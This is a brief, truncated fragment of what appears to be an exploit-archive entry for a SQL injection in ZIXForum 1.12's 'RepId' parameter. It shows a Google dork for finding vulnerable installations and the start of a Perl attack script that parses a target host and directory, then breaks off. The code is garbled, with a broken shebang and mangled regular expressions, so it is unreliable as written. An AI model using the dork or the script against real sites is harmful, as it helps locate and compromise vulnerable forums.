Zix Forum 1.12 - 'RepId' SQL Injection (2)
!/usr/bin/perl ZIXForum Google dork: intext:"ZIXForum 1.12 by: ZixCom 2002" use IO::Socket::INET; usage unless @ARGV == 2; $host = shift@ARGV; $dir = shift@ARGV; $dir = "/$dir" if $dir ! /^//; $dir = "$dir/" if $dir ! //$/; $host = s/http:////g; $path =...